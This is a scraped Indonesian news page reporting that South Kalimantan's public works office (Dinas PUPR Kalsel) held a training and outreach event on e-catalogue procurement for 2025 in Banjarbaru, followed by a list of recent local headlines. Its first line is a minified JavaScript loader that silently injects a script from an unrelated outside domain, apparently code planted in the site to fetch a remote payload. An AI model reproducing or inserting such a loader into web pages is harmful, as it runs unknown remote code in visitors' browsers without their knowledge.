(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PUPR PROV KALSEL

Dinas PUPR Kalsel Gelar Bimtek dan Sosialisasi E-Katalog Keciptakaryaan 2025


KANALKALIMANTAN.COM, BANJARBARU – Guna meningkatkan pemahaman dan keterampilan peserta mengenai pengadaan barang/jasa melalui e-katalog dengan metode mini kompetisi Dinas PUPR Kalimantan Selatan mengadakan Bimbingan Teknis dan Sosialisasi E-Katalog Keciptakaryaan tahun 2025 di Banjarbaru, Kamis (23/1/2025).

Kegiatan bimtek dan sosialisasi ini dibuka Plt Kadis PUPR Kalsel, M Yasin Toyib yang dalam kesempatannya mengatakan di era digital yang terus berkembang, penerapan teknologi informasi menjadi kunci dalam meningkatkan efisiensi dan transparansi dalam berbagai sektor, termasuk dalam pengadaan barang dan jasa pemerintah.

“Pengadaan barang dan jasa merupakan bagian vital dalam operasional pemerintah untuk memenuhi kebutuhan masyarakat,” katanya.

Menurut dia, E-Katalog adalah sistem informasi elektronik yang memuat daftar, jenis, spesifikasi teknis dan harga barang/jasa tertentu dari berbagai penyedia barang/jasa untuk memenuhi kebutuhan spesifik pemerintah daerah.

Baca juga: Dosen ASN di Kalsel Demo Tuntutan “Bayar Hutang” Tukin 4 Tahun 

“E-katalog lokal sebagai wujud transparansi dan akuntabilitas penggunaan anggaran negara dalam hal pengadaan barang/jasa, mengembangkan peran serta penyedia lokal termasuk UMKM,” ungkap dia.

Selain itu, lanjut dia, keberadaan E-katalog lokal akan memprioritaskan penyedia barang dan jasa untuk pemerintah daerah dari pengusaha lokal setempat baik melalui UMKM maupun koperasi. Penerapan katalog elektronik lokal ini juga diyakini bisa menghemat anggaran APBD.

Dia berharap melalui bimbingan teknis dan sosialisasi e-katalog keciptakaryaan ini dapat dijadikan sebagai sarana pembelajaran, konsultasi dan saling berbagi informasi sehingga pada akhirnya dapat mendorong kinerja Pemerintah Provinsi Kalimantan Selatan terutama dalam meningkatkan kualitas pelayanan pengadaan barang/jasa di bidang keciptakaryaan.

Baca juga: Tewaskan AJ, Pelaku Penusukan di Liang Anggang Dibekuk di Tapin, Ini Pemicunya

Kegiatan ini diikuti 100 peserta dari Dinas Pekerjaan Umum dan Penataan Ruang Provinsi Kalimantan Selatan serta para penyedia barang/jasa.

Materi disampaikan oleh narasumber dari Kementerian Pekerjaan Umum, LKPP RI, dan biro pengadaan barang/jasa provinsi terkait. (Kanalkalimantan.com/MCKalsel/kk)

Reporter: mckalsel
Editor: Dhani


Risa

Recent Posts

Remaja 13 Tahun Terseret Arus di Sungai Martapura

KANALKALIMANTAN.COM, BANJARMASIN — Seorang remaja laki-laki dilaporkan tenggelam di Sungai Martapura, Jalan Rantauan Darat, Kecamatan… Read More

7 jam ago

Ikmaban Salurkan Bantuan Banjir di Desa Pejambuan

KANALKALIMANTAN.COM, MARTAPURA - Ikatan Mahasiswa Banjarmasin (Ikmaban) menyalurkan bantuan kepada warga terdampak banjir di Desa… Read More

13 jam ago

Pemko Banjarmasin Janjikan Normalisasi Aliran Sungai Gampa

KANALKALIMANTAN.COM, BANJARMASIN - Banjir rob atau banjir pasang pesisir yang melanda kawasan Sungai Gampa, Kelurahan… Read More

15 jam ago

Gubernur Muhidin Instruksikan Semua SKPD Kirim Bantuan Korban Banjir

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan (Kalsel), H Muhidin, instruksikan seluruh Kepala Satuan Kerja Perangkat… Read More

16 jam ago

Banjir Rob di Tanjung Pagar 45 KK Terdampak

KANALKALIMANTAN.COM, BANJARMASIN — Banjir yang menggenangi Jalan Kelayan Besar, RT 04, Kelurahan Tanjung Pagar, Kecamatan… Read More

16 jam ago

Peringatan Isra Mikraj di PTAM Intan Banjar Diisi Tausiah oleh Habib Syauqi

KANALKALIMANTAN.COM, BANJARBARU – Peringatan Isra Mikraj Nabi Besar Muhammad SAW 1447 Hijriah, di aula kantor… Read More

1 hari ago

This website uses cookies.